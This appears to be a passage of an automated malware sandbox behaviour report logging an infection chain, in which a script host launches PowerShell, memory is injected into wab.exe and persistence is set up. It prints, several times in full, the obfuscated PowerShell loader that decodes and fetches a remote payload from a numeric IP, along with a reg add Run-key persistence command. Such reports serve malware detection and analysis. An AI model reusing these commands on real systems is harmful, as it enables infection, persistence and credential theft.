Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 26_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4923 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4947 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6020 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3769 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 2099 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5464 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844 Thread sleep count: 6020 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844 Thread sleep count: 3769 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6556 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4736 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3944 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3944 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 2099 delay: -5 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0040AE51 FindFirstFileW,FindNextFileW, 26_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 27_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 28_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00418981 memset,GetSystemInfo, 26_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WCN\en-GB\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\ Jump to behavior
Source: powershell.exe, 0000000B.00000002.2256205414.000001C4745A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_07C617D1 LdrInitializeThunk, 15_2_07C617D1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 26_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 26_2_004044A4

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 37D0000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 255FC20 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rzjadswnvivpittonfdpwjkbajsojzmco" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bbote" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$typhoids213 = 1;$atrible='substrin';$atrible+='g';function noncolloid($offtype){$focalisation=$offtype.length-$typhoids213;for($halmknipperne183=6; $halmknipperne183 -lt $focalisation; $halmknipperne183+=(7)){$eksistensberettigelsers+=$offtype.$atrible.invoke($halmknipperne183, $typhoids213);}$eksistensberettigelsers;}function skruegangen($epileptikere){. ($slagfjedres) ($epileptikere);}$totalsaneringens=noncolloid 'oenophmunesseoma,lesz fastli c,amolrelatil pud.na f.lmk/hem el5 bakk..ensign0hepato lr.rk(feasinwuddrivihalvpunlaanendbltedyopopulaw pectrsfly,as st alvnindladtdiapha kampv1sygele0duv,ty.smaate0t rgiv; finge so,enewpokerfiludd rn elvov6unwins4produk;gastro arylaxd.pped6bl ker4t veaa;nonval prinrbovensv en ag:ce.ser1 bldg.2coelio1 sterr.sellaa0foreto)svange logikpgsub,tienyhedscov,ryekmiljstopan li/horome2d.ctyl0wordst1skibsb0 vajen0cascab1 chubb0 lands1 edest tsil.f.igsstidataber portee tje efblendaobabs nx raspe/subpet1 ,alst2ytterp1terr.s.append0datalo ';$fewterer=noncolloid 'outpouusam ens finebevalgkarndring-museo,at.tradgendagse driftnconveyth skwo ';$onomatological=noncolloid ' dor khreforgtdepicttgrnsevp skatt:la,ish/signal/egebr.8flanne7re.sbg.garden1fluoar2i.sera1ov rta.folioa1forret0vejrud5 galip.jockey1alpeho8overme4tilfrs/kil,brfvandreofusiondklinkeg gulvmn ,caphglipolyeblkketrmillibopolya,vstiknaeeristirlandingmodbydablokf nsubu bgforvalsencykl.cecostpdentalrbaconimbrordt ';$raastofforbrugets=noncolloid 'tyrann>erythr ';$slagfjedres=noncolloid 'philosi glatievejby xporch ';$chlor = noncolloid ' rei.seovnopocklassihpretarofael,e pontif%boltelalich.ipvalderpl.parodchordaastudeotchefkaastdfan% reage\kom unu bedfon k,rnipcat.clr.tvrkeeillapsd telluitelephc,ecramtmaalesa.koldnbmehtarl boheaebyeno,nmalajae sj.eds f.rbissermon.kat lyn roteae,etribgcocard senso.& abais&centra taktikephot ccskoggehbibellophrase tartuf$pensio ';skruegangen (noncolloid 'skrive$verdengvomitollo ninononap.bphraseafremtiltirriv:nashves utoyechurricosta meuhove arsteno,emisereskaritasgodk n=unburl(skamskctil,ifmroyen dnicoti trat/capablc splej timber$trojkackarburh san,rltreatmo artigrkaol,n)hjkant ');skruegangen (noncolloid 'or,cul$tekstsgintolelirett.o proscb urisda nonsyl tyksa:saf.natfitc eooverafpcorrivs myelolv nfrb=thespi$bispegoplo.tentvehuno.fordem ,aareaudvandt upersodik malzuccheodrejefgparaffikollidc afv.sabarytolreklip.ma lassomkrsepafslutludludeitid,antudkast(counte$uddannrgallywavar.tgau sletsdoubletsonovoofrdselftales fdosernomisdicrudkli,bf,stprrspiritureconggoverbaeuninsutplankssakkvis)anther ');$onomatological=$topsl[0];skruegangen (noncolloid 'photoc$endop.gbreithltredivo,tikhvbbe katarug,ndlphonsc:menn.sirotatis ribieostaalhtcudgelos,rupgphepatoeech nosroyalt=georgin in.daehylarcws.akor-tils,dofo vikbcarancjhalloiewallflchylop tdisagr afhngisoverbeyafmontsfi,bett mic,ietruantm adelh.exc.llnmaskined
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$typhoids213 = 1;$atrible='substrin';$atrible+='g';function noncolloid($offtype){$focalisation=$offtype.length-$typhoids213;for($halmknipperne183=6; $halmknipperne183 -lt $focalisation; $halmknipperne183+=(7)){$eksistensberettigelsers+=$offtype.$atrible.invoke($halmknipperne183, $typhoids213);}$eksistensberettigelsers;}function skruegangen($epileptikere){. ($slagfjedres) ($epileptikere);}$totalsaneringens=noncolloid 'oenophmunesseoma,lesz fastli c,amolrelatil pud.na f.lmk/hem el5 bakk..ensign0hepato lr.rk(feasinwuddrivihalvpunlaanendbltedyopopulaw pectrsfly,as st alvnindladtdiapha kampv1sygele0duv,ty.smaate0t rgiv; finge so,enewpokerfiludd rn elvov6unwins4produk;gastro arylaxd.pped6bl ker4t veaa;nonval prinrbovensv en ag:ce.ser1 bldg.2coelio1 sterr.sellaa0foreto)svange logikpgsub,tienyhedscov,ryekmiljstopan li/horome2d.ctyl0wordst1skibsb0 vajen0cascab1 chubb0 lands1 edest tsil.f.igsstidataber portee tje efblendaobabs nx raspe/subpet1 ,alst2ytterp1terr.s.append0datalo ';$fewterer=noncolloid 'outpouusam ens finebevalgkarndring-museo,at.tradgendagse driftnconveyth skwo ';$onomatological=noncolloid ' dor khreforgtdepicttgrnsevp skatt:la,ish/signal/egebr.8flanne7re.sbg.garden1fluoar2i.sera1ov rta.folioa1forret0vejrud5 galip.jockey1alpeho8overme4tilfrs/kil,brfvandreofusiondklinkeg gulvmn ,caphglipolyeblkketrmillibopolya,vstiknaeeristirlandingmodbydablokf nsubu bgforvalsencykl.cecostpdentalrbaconimbrordt ';$raastofforbrugets=noncolloid 'tyrann>erythr ';$slagfjedres=noncolloid 'philosi glatievejby xporch ';$chlor = noncolloid ' rei.seovnopocklassihpretarofael,e pontif%boltelalich.ipvalderpl.parodchordaastudeotchefkaastdfan% reage\kom unu bedfon k,rnipcat.clr.tvrkeeillapsd telluitelephc,ecramtmaalesa.koldnbmehtarl boheaebyeno,nmalajae sj.eds f.rbissermon.kat lyn roteae,etribgcocard senso.& abais&centra taktikephot ccskoggehbibellophrase tartuf$pensio ';skruegangen (noncolloid 'skrive$verdengvomitollo ninononap.bphraseafremtiltirriv:nashves utoyechurricosta meuhove arsteno,emisereskaritasgodk n=unburl(skamskctil,ifmroyen dnicoti trat/capablc splej timber$trojkackarburh san,rltreatmo artigrkaol,n)hjkant ');skruegangen (noncolloid 'or,cul$tekstsgintolelirett.o proscb urisda nonsyl tyksa:saf.natfitc eooverafpcorrivs myelolv nfrb=thespi$bispegoplo.tentvehuno.fordem ,aareaudvandt upersodik malzuccheodrejefgparaffikollidc afv.sabarytolreklip.ma lassomkrsepafslutludludeitid,antudkast(counte$uddannrgallywavar.tgau sletsdoubletsonovoofrdselftales fdosernomisdicrudkli,bf,stprrspiritureconggoverbaeuninsutplankssakkvis)anther ');$onomatological=$topsl[0];skruegangen (noncolloid 'photoc$endop.gbreithltredivo,tikhvbbe katarug,ndlphonsc:menn.sirotatis ribieostaalhtcudgelos,rupgphepatoeech nosroyalt=georgin in.daehylarcws.akor-tils,dofo vikbcarancjhalloiewallflchylop tdisagr afhngisoverbeyafmontsfi,bett mic,ietruantm adelh.exc.llnmaskined
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "naergaaende" /t reg_expand_sz /d "%trkkerdrengens% -w 1 $tenementize=(get-itemproperty -path 'hkcu:\wabbles\').erende29;%trkkerdrengens% ($tenementize)"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$typhoids213 = 1;$atrible='substrin';$atrible+='g';function noncolloid($offtype){$focalisation=$offtype.length-$typhoids213;for($halmknipperne183=6; $halmknipperne183 -lt $focalisation; $halmknipperne183+=(7)){$eksistensberettigelsers+=$offtype.$atrible.invoke($halmknipperne183, $typhoids213);}$eksistensberettigelsers;}function skruegangen($epileptikere){. ($slagfjedres) ($epileptikere);}$totalsaneringens=noncolloid 'oenophmunesseoma,lesz fastli c,amolrelatil pud.na f.lmk/hem el5 bakk..ensign0hepato lr.rk(feasinwuddrivihalvpunlaanendbltedyopopulaw pectrsfly,as st alvnindladtdiapha kampv1sygele0duv,ty.smaate0t rgiv; finge so,enewpokerfiludd rn elvov6unwins4produk;gastro arylaxd.pped6bl ker4t veaa;nonval prinrbovensv en ag:ce.ser1 bldg.2coelio1 sterr.sellaa0foreto)svange logikpgsub,tienyhedscov,ryekmiljstopan li/horome2d.ctyl0wordst1skibsb0 vajen0cascab1 chubb0 lands1 edest tsil.f.igsstidataber portee tje efblendaobabs nx raspe/subpet1 ,alst2ytterp1terr.s.append0datalo ';$fewterer=noncolloid 'outpouusam ens finebevalgkarndring-museo,at.tradgendagse driftnconveyth skwo ';$onomatological=noncolloid ' dor khreforgtdepicttgrnsevp skatt:la,ish/signal/egebr.8flanne7re.sbg.garden1fluoar2i.sera1ov rta.folioa1forret0vejrud5 galip.jockey1alpeho8overme4tilfrs/kil,brfvandreofusiondklinkeg gulvmn ,caphglipolyeblkketrmillibopolya,vstiknaeeristirlandingmodbydablokf nsubu bgforvalsencykl.cecostpdentalrbaconimbrordt ';$raastofforbrugets=noncolloid 'tyrann>erythr ';$slagfjedres=noncolloid 'philosi glatievejby xporch ';$chlor = noncolloid ' rei.seovnopocklassihpretarofael,e pontif%boltelalich.ipvalderpl.parodchordaastudeotchefkaastdfan% reage\kom unu bedfon k,rnipcat.clr.tvrkeeillapsd telluitelephc,ecramtmaalesa.koldnbmehtarl 